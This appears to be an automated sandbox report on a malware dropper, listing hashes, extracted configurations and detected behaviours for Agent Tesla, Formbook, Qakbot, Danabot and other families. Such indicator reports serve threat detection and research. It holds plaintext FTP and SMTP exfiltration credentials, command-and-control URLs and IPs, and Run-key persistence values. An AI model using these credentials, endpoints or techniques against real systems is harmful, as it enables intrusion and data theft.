agenttesla | a6942a7cce17a9de2ff1679f685796468698f06a45f6e4e97b9ff5027ef35a86

Analysis

max time kernel
1793s
max time network
1807s
platform
windows7_x64
resource
win7v20201028
submitted
19-11-2020 17:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Downloads.exe
Size

141.0MB
MD5

07917bc6f34323a498bbbf68eb446724
SHA1

6f192776575fe4087684d24a0a5fb07e5a1c76ed
SHA256

a6942a7cce17a9de2ff1679f685796468698f06a45f6e4e97b9ff5027ef35a86
SHA512

55ce66a638c3a939cfc3031c5f5f194181730a3d27ffd47524a2c5a1947b0cf4cbb38e65d39077d7947d40d952c11c68597e591c58bc025c62e6850d53036aee

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
45.141.184.35
Port:
21
Username:
alex
Password:
easypassword

Extracted

Credentials

Protocol: smtp
Host:
mail.pro-powersourcing.com
Port:
587
Username:
vivi@pro-powersourcing.com
Password:
china1977

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

formbook

Version

4.0

http://www.worstig.com/w9z/

Decoy

crazzysex.com

hanferd.com

gteesrd.com

bayfrontbabyplace.com

jicuiquan.net

relationshiplink.net

ohchacyberphoto.com

kauegimenes.com

powerful-seldom.com

ketotoken.com

make-money-online-success.com

redgoldcollection.com

hannan-football.com

hamptondc.com

vllii.com

aa8520.com

platform35markethall.com

larozeimmo.com

oligopoly.net

llhak.info

Extracted

Family

gozi_rm3

Botnet

86920224

https://sibelikinciel.xyz

Attributes

build
300869
exe_type
loader
server_id
12
url_path
index.htm

rsa_pubkey.plain

serpent.plain

Extracted

Family

formbook

Version

4.1

http://www.joomlas123.com/i0qi/

http://www.norjax.com/app/

Decoy

mytakeawaybox.com

goutaihuo.com

kuzey.site

uppertenpiercings.amsterdam

honeygrandpa.com

jenniferabramslaw.com

ncarian.com

heavilymeditatedhouston.com

gsbjyzx.com

akisanblog.com

taoyuanreed.com

jasperrvservices.com

yabbanet.com

myhealthfuldiet.com

flipdigitalcoins.com

toes.photos

shoottillyoumiss.com

maserental.com

smarteacher.net

hamdimagdeco.com

Extracted

Family

danabot

92.204.160.54

2.56.213.179

45.153.186.47

93.115.21.29

185.45.193.50

193.34.166.247

rsa_pubkey.plain

Extracted

Family

qakbot

Botnet

spx129

Campaign

1590734339

94.10.81.239:443

94.52.160.116:443

67.0.74.119:443

175.137.136.79:443

73.232.165.200:995

79.119.67.149:443

62.38.111.70:2222

108.58.9.238:993

216.110.249.252:2222

67.209.195.198:3389

84.247.55.190:443

96.37.137.42:443

94.176.220.76:2222

173.245.152.231:443

96.227.122.123:443

188.192.75.8:995

24.229.245.124:995

71.163.225.75:443

75.71.77.59:443

104.36.135.227:443

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

CoreEntity .NET Packer 1 IoCs

A .NET packer called CoreEntity where it has embedded the payload as a BitMap object which is later decrypted.

coreentity

Processes:

resource	yara_rule
behavioral2/memory/2180-672-0x00000000006E0000-0x00000000006E2000-memory.dmp	coreentity

Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot

Danabot x86 payload 12 IoCs

Detection of Danabot x86 payload, mapped in memory during the execution of its loader.

botnet

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\4.dll	family_danabot
C:\Users\Admin\AppData\Roaming\4.dll	family_danabot
\Users\Admin\AppData\Roaming\4.dll	family_danabot
\Users\Admin\AppData\Roaming\29.dll	family_danabot
\Users\Admin\AppData\Roaming\29.dll	family_danabot
\Users\Admin\AppData\Roaming\29.dll	family_danabot
\Users\Admin\AppData\Roaming\29.dll	family_danabot
\Users\Admin\AppData\Roaming\29.dll	family_danabot
C:\Users\Admin\AppData\Roaming\29.dll	family_danabot
\Users\Admin\AppData\Roaming\4.dll	family_danabot
\Users\Admin\AppData\Roaming\4.dll	family_danabot
\Users\Admin\AppData\Roaming\4.dll	family_danabot

Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma
Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Gozi RM3
A heavily modified version of Gozi using RM3 loader.
banker trojan gozi_rm3
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies visiblity of hidden/system files in Explorer 2 TTPs
evasion

Hidden Files and Directories
T1158

Modify Registry
T1112
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
trojan plugx
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
rat spyware stealer pony
Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

Processes:

resource	yara_rule
C:\ProgramData\WindowsTask\system.exe	family_redline
C:\ProgramData\WindowsTask\system.exe	family_redline
\ProgramData\WindowsTask\system.exe	family_redline

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8encoder.dll	acprotect
C:\ProgramData\Windows\vp8decoder.dll	acprotect

AgentTesla Payload 25 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\8.exe	family_agenttesla
C:\Users\Admin\AppData\Roaming\8.exe	family_agenttesla
behavioral2/memory/1552-734-0x000000000044C82E-mapping.dmp	family_agenttesla
behavioral2/memory/1552-738-0x0000000000400000-0x0000000000452000-memory.dmp	family_agenttesla
behavioral2/memory/1552-736-0x0000000000400000-0x0000000000452000-memory.dmp	family_agenttesla
behavioral2/memory/1552-733-0x0000000000400000-0x0000000000452000-memory.dmp	family_agenttesla
behavioral2/memory/4700-917-0x000000000044CCFE-mapping.dmp	family_agenttesla
\Users\Admin\AppData\Roaming\8.exe	family_agenttesla
\Users\Admin\AppData\Roaming\8.exe	family_agenttesla
C:\Users\Admin\AppData\Roaming\feeed.exe	family_agenttesla
behavioral2/memory/4700-956-0x0000000000400000-0x0000000000452000-memory.dmp	family_agenttesla
behavioral2/memory/4948-1074-0x000000000044CB3E-mapping.dmp	family_agenttesla
behavioral2/memory/4948-1073-0x0000000000400000-0x0000000000452000-memory.dmp	family_agenttesla
behavioral2/memory/4948-1076-0x0000000000400000-0x0000000000452000-memory.dmp	family_agenttesla
C:\Users\Admin\AppData\Roaming\feeed.exe	family_agenttesla
behavioral2/memory/4700-954-0x0000000000400000-0x0000000000452000-memory.dmp	family_agenttesla
\Users\Admin\AppData\Roaming\feeed.exe	family_agenttesla
behavioral2/memory/4700-911-0x0000000000400000-0x0000000000452000-memory.dmp	family_agenttesla
behavioral2/memory/4580-1123-0x0000000000400000-0x0000000000450000-memory.dmp	family_agenttesla
behavioral2/memory/4580-1124-0x000000000044A49E-mapping.dmp	family_agenttesla
behavioral2/memory/4580-1126-0x0000000000400000-0x0000000000450000-memory.dmp	family_agenttesla
behavioral2/memory/3704-1136-0x0000000000090000-0x00000000000E2000-memory.dmp	family_agenttesla
behavioral2/memory/3704-1134-0x0000000000090000-0x00000000000E2000-memory.dmp	family_agenttesla
behavioral2/memory/3704-1129-0x000000000044CF8E-mapping.dmp	family_agenttesla
behavioral2/memory/4580-1127-0x0000000000400000-0x0000000000450000-memory.dmp	family_agenttesla

CryptOne packer 15 IoCs

Detects CryptOne packer defined in NCC blogpost.

cryptone packer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\6.exe	cryptone
C:\Users\Admin\AppData\Roaming\6.exe	cryptone
C:\Users\Admin\AppData\Roaming\27.exe	cryptone
C:\Users\Admin\AppData\Roaming\27.exe	cryptone
C:\Users\Admin\AppData\Roaming\27.exe	cryptone
\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe	cryptone
C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe	cryptone
\Users\Admin\AppData\Roaming\27.exe	cryptone
\Users\Admin\AppData\Roaming\27.exe	cryptone
C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe	cryptone
C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe	cryptone
\Users\Admin\AppData\Roaming\27.exe	cryptone
\Users\Admin\AppData\Roaming\27.exe	cryptone
\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe	cryptone
C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe	cryptone

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Formbook Payload 21 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/2148-318-0x0000000000400000-0x000000000042D000-memory.dmp	formbook
behavioral2/memory/2148-324-0x000000000041E2D0-mapping.dmp	formbook
behavioral2/memory/2428-379-0x0000000000000000-mapping.dmp	formbook
behavioral2/memory/3636-591-0x0000000000000000-mapping.dmp	formbook
behavioral2/memory/2768-1082-0x0000000000000000-mapping.dmp	formbook
behavioral2/memory/2828-1128-0x0000000000400000-0x000000000042D000-memory.dmp	formbook
behavioral2/memory/2828-1131-0x000000000041E270-mapping.dmp	formbook
behavioral2/memory/4560-1165-0x0000000000000000-mapping.dmp	formbook
behavioral2/memory/1568-1168-0x000000000041E2D0-mapping.dmp	formbook
behavioral2/memory/4976-1253-0x0000000000000000-mapping.dmp	formbook
behavioral2/memory/4032-1285-0x000000000041E2D0-mapping.dmp	formbook
behavioral2/memory/3692-1312-0x0000000000000000-mapping.dmp	formbook
behavioral2/memory/2412-1392-0x000000000041E2D0-mapping.dmp	formbook
behavioral2/memory/3580-1565-0x000000000041E2D0-mapping.dmp	formbook
behavioral2/memory/4424-1599-0x000000000041E2D0-mapping.dmp	formbook
behavioral2/memory/2428-1610-0x00000000030F0000-0x00000000031FA000-memory.dmp	formbook
behavioral2/memory/4436-1611-0x0000000000000048-mapping.dmp	formbook
behavioral2/memory/4616-1621-0x000000000041E270-mapping.dmp	formbook
behavioral2/memory/2428-1623-0x00000000030F0000-0x00000000031FA000-memory.dmp	formbook
behavioral2/memory/2568-1624-0x000000000000004C-mapping.dmp	formbook
behavioral2/memory/5612-1625-0x0000000000000000-mapping.dmp	formbook

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Guloader Payload 2 IoCs

guloader

Processes:

resource	yara_rule
behavioral2/memory/4436-1611-0x0000000000000048-mapping.dmp	family_guloader
behavioral2/memory/2568-1624-0x000000000000004C-mapping.dmp	family_guloader

Looks for VirtualBox Guest Additions in registry 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Nirsoft 4 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\jfiag_gg.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe	Nirsoft
\Users\Admin\AppData\Local\Temp\jfiag_gg.exe	Nirsoft

ReZer0 packer 4 IoCs

Detects ReZer0, a packer with multiple versions used in various campaigns.

rezer0

Processes:

resource	yara_rule
behavioral2/memory/2180-679-0x0000000004F70000-0x0000000004FC3000-memory.dmp	rezer0
behavioral2/memory/3956-685-0x0000000004C10000-0x0000000004C61000-memory.dmp	rezer0
behavioral2/memory/3832-704-0x0000000004C80000-0x0000000004CD3000-memory.dmp	rezer0
behavioral2/memory/3396-779-0x00000000009D0000-0x00000000009D9000-memory.dmp	rezer0

ASPack v2.12-2.42 8 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
\ProgramData\Windows\rutserv.exe	aspack_v212_v242
\ProgramData\Windows\rutserv.exe	aspack_v212_v242

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

cmmon32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	cmmon32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VJLHZLDXN = "C:\\Program Files (x86)\\Lgzhxwx\\IconCachenb6h.exe"	cmmon32.exe

Blocklisted process makes network request 64 IoCs

Processes:

rundll32.exerundll32.exerundll32.exe

flow	pid	process
63	3284	rundll32.exe
69	3596	rundll32.exe
70	3596	rundll32.exe
71	3800	rundll32.exe
78	3596	rundll32.exe
79	3800	rundll32.exe
89	3596	rundll32.exe
90	3800	rundll32.exe
94	3800	rundll32.exe
95	3800	rundll32.exe
113	3596	rundll32.exe
117	3800	rundll32.exe
126	3596	rundll32.exe
127	3800	rundll32.exe
130	3596	rundll32.exe
133	3800	rundll32.exe
149	3596	rundll32.exe
151	3596	rundll32.exe
157	3800	rundll32.exe
167	3596	rundll32.exe
171	3800	rundll32.exe
506	3596	rundll32.exe
507	3596	rundll32.exe
508	3596	rundll32.exe
509	3596	rundll32.exe
512	3800	rundll32.exe
516	3596	rundll32.exe
541	3800	rundll32.exe
544	3596	rundll32.exe
567	3800	rundll32.exe
571	3596	rundll32.exe
582	3800	rundll32.exe
585	3596	rundll32.exe
600	3800	rundll32.exe
601	3596	rundll32.exe
602	3800	rundll32.exe
603	3800	rundll32.exe
604	3800	rundll32.exe
605	3800	rundll32.exe
608	3800	rundll32.exe
610	3800	rundll32.exe
623	3596	rundll32.exe
627	3800	rundll32.exe
638	3596	rundll32.exe
639	3800	rundll32.exe
647	3596	rundll32.exe
649	3800	rundll32.exe
656	3596	rundll32.exe
660	3800	rundll32.exe
670	3596	rundll32.exe
675	3800	rundll32.exe
687	3596	rundll32.exe
689	3800	rundll32.exe
729	3596	rundll32.exe
732	3800	rundll32.exe
735	3596	rundll32.exe
738	3596	rundll32.exe
739	3800	rundll32.exe
743	3596	rundll32.exe
749	3800	rundll32.exe
750	3596	rundll32.exe
770	3800	rundll32.exe
775	3800	rundll32.exe
799	3596	rundll32.exe

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion
Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 4 IoCs

Processes:

MSBuild.execmd.exeupdate.exe24.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	MSBuild.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	update.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	24.exe

Executes dropped EXE 64 IoCs

Processes:

update.exeTreasure.Vault.3D.Screensaver.keygen.by.Paradox.exeRemouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exewini.exewinit.exeintro.exekeygen-pr.exekeygen-step-1.execheat.exekeygen-step-4.exerutserv.exekey.exe002.exekey.exetaskhost.exerutserv.exerutserv.exerutserv.exeMagic_File_v3_keygen_by_KeygenNinja.exeintro.exekeygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exe002.exekey.exekey.exeLtHv0O2KZDK4M637.exekeygen-pr.exekeygen-step-3.exekeygen-step-4.exeapi.exe31.exeSetup.exeSetup.exe3DMark 11 Advanced Edition.exe2.exe3.exe4.exe2.exe5.exekey.exe6.exeSetup.exe7.exe8.exe9.exe10.exe11.exe12.exe13.exe14.exekey.exe15.exe16.exe17.exe18.exe19.exesetup.exesetup.exe20.exe21.exe22.exe23.exe

pid	process
1748	update.exe
1116	Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
1248	Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
876	wini.exe
1632	winit.exe
996	intro.exe
1320	keygen-pr.exe
1604	keygen-step-1.exe
1764	cheat.exe
316	keygen-step-4.exe
1516	rutserv.exe
1236	key.exe
1940	002.exe
620	key.exe
1760	taskhost.exe
1600	rutserv.exe
2180	rutserv.exe
2280	rutserv.exe
2356	Magic_File_v3_keygen_by_KeygenNinja.exe
2552	intro.exe
2580	keygen-pr.exe
2688	keygen-step-1.exe
2756	keygen-step-3.exe
2804	keygen-step-4.exe
3060	002.exe
1416	key.exe
2624	key.exe
1732	LtHv0O2KZDK4M637.exe
2696	keygen-pr.exe
2876	keygen-step-3.exe
2964	keygen-step-4.exe
2308	api.exe
3036	31.exe
2604	Setup.exe
436	Setup.exe
488	3DMark 11 Advanced Edition.exe
1076	2.exe
2632	3.exe
2744	4.exe
2148	2.exe
2588	5.exe
2652	key.exe
1776	6.exe
1288	Setup.exe
1900	7.exe
2352	8.exe
2180	9.exe
2076	10.exe
1844	11.exe
2124	12.exe
1604	13.exe
2648	14.exe
3024	key.exe
1944	15.exe
816	16.exe
2012	17.exe
3068	18.exe
3008	19.exe
3304	setup.exe
3264	setup.exe
3136	20.exe
3384	21.exe
3552	22.exe
3744	23.exe

Looks for VMWare Tools registry key 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
ransomware

Processes:

16.exe

description ioc process

File opened for modification C:\Users\Admin\Pictures\ReceiveEnter.tiff 16.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\ReceiveEnter.tiff	16.exe

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\gdiview.msi	office_xlm_macros

UPX packed file 19 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8encoder.dll	upx
C:\ProgramData\Windows\vp8decoder.dll	upx
C:\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe	upx
\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe	upx
\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe	upx
\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe	upx
C:\ProgramData\install\utorrent.exe	upx
\ProgramData\install\utorrent.exe	upx
C:\Programdata\Install\utorrent.exe	upx
C:\ProgramData\WindowsTask\update.exe	upx
C:\ProgramData\WindowsTask\update.exe	upx
C:\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag_gg.exe	upx
\ProgramData\WindowsTask\update.exe	upx
C:\Users\Admin\Desktop\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe	upx
C:\ProgramData\WindowsTask\winlogon.exe	upx
C:\Programdata\WindowsTask\winlogon.exe	upx

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

11.exeregsvcojoduf-.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	11.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	11.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	regsvcojoduf-.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	regsvcojoduf-.exe

Checks QEMU agent file 2 TTPs 16 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RegAsm.exe3.exe23.exe28.exe7.exe3.exe15.exe13.exe19.exe19.exe25.exe31.exeStyltendeschris.exeStyltendeschris.exe13.exe20.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	RegAsm.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	3.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	23.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	28.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	7.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	3.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	15.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	13.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	19.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	19.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	25.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	31.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	Styltendeschris.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	Styltendeschris.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	13.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	20.exe

Drops startup file 6 IoCs

Processes:

16.exe30.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\16.exe	16.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PickerHost.url	30.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	16.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO	16.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta	16.exe

Loads dropped DLL 64 IoCs

Processes:

update.exewini.execmd.execmd.exekeygen-pr.exekeygen-step-4.execheat.exekey.execmd.exekeygen-step-4.exekeygen-pr.exekey.execmd.exekeygen-pr.exekeygen-step-4.exeSetup.exeSetup.exeSetup.exe

pid	process
1748	update.exe
876	wini.exe
876	wini.exe
876	wini.exe
876	wini.exe
240	cmd.exe
240	cmd.exe
240	cmd.exe
240	cmd.exe
1748	update.exe
240	cmd.exe
440	cmd.exe
1320	keygen-pr.exe
1320	keygen-pr.exe
1320	keygen-pr.exe
1320	keygen-pr.exe
316	keygen-step-4.exe
316	keygen-step-4.exe
316	keygen-step-4.exe
316	keygen-step-4.exe
316	keygen-step-4.exe
1764	cheat.exe
1764	cheat.exe
1764	cheat.exe
1764	cheat.exe
1236	key.exe
2328	cmd.exe
2328	cmd.exe
2328	cmd.exe
2328	cmd.exe
2328	cmd.exe
2328	cmd.exe
2804	keygen-step-4.exe
2804	keygen-step-4.exe
2804	keygen-step-4.exe
2804	keygen-step-4.exe
2580	keygen-pr.exe
2580	keygen-pr.exe
2580	keygen-pr.exe
2580	keygen-pr.exe
1416	key.exe
2144	cmd.exe
2144	cmd.exe
316	keygen-step-4.exe
2144	cmd.exe
2804	keygen-step-4.exe
2696	keygen-pr.exe
2696	keygen-pr.exe
316	keygen-step-4.exe
316	keygen-step-4.exe
316	keygen-step-4.exe
2964	keygen-step-4.exe
2804	keygen-step-4.exe
2804	keygen-step-4.exe
2804	keygen-step-4.exe
2696	keygen-pr.exe
2696	keygen-pr.exe
2964	keygen-step-4.exe
2964	keygen-step-4.exe
2964	keygen-step-4.exe
436	Setup.exe
2604	Setup.exe
1288	Setup.exe
1288	Setup.exe

Modifies file permissions 1 TTPs 56 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
844	icacls.exe
2592	icacls.exe
2112	icacls.exe
3480	icacls.exe
1236	icacls.exe
3040	icacls.exe
1376	icacls.exe
2576	icacls.exe
2044	icacls.exe
2588	icacls.exe
2156	icacls.exe
3028	icacls.exe
552	icacls.exe
2988	icacls.exe
2072	icacls.exe
2836	icacls.exe
3488	icacls.exe
1720	icacls.exe
3880	icacls.exe
1920	icacls.exe
2836	icacls.exe
2328	icacls.exe
2112	icacls.exe
3424	icacls.exe
3704	icacls.exe
3296	icacls.exe
2844	icacls.exe
3540	icacls.exe
3464	icacls.exe
1068	icacls.exe
1636	icacls.exe
3640	icacls.exe
1944	icacls.exe
3016	icacls.exe
1844	icacls.exe
3648	icacls.exe
1880	icacls.exe
564	icacls.exe
1772	icacls.exe
1752	icacls.exe
2944	icacls.exe
1476	icacls.exe
2944	icacls.exe
3520	icacls.exe
3756	icacls.exe
4060	icacls.exe
3616	icacls.exe
3236	icacls.exe
3724	icacls.exe
2988	icacls.exe
2532	icacls.exe
3716	icacls.exe
2672	icacls.exe
3652	icacls.exe
4080	icacls.exe
3456	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral2/memory/2352-484-0x00000000002C0000-0x00000000002CF000-memory.dmp	agile_net

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 22 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

13.exemstsc.exeStyltendeschris.execmmon32.exe16.exetaskhostw.exeRegAsm.exe3.exejuppp.exereg.exehmwmcj.exeMSBuild.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\PANOREREDEOPTIM = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Trainbandanigon6\\Styltendeschris.vbs"	13.exe
Key created	\Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	mstsc.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	Styltendeschris.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\PANOREREDEOPTIM = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Trainbandanigon6\\Styltendeschris.vbs"	Styltendeschris.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\8PB8S29 = "C:\\Program Files (x86)\\Zif6hz\\regsvcojoduf-.exe"	cmmon32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\""	16.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
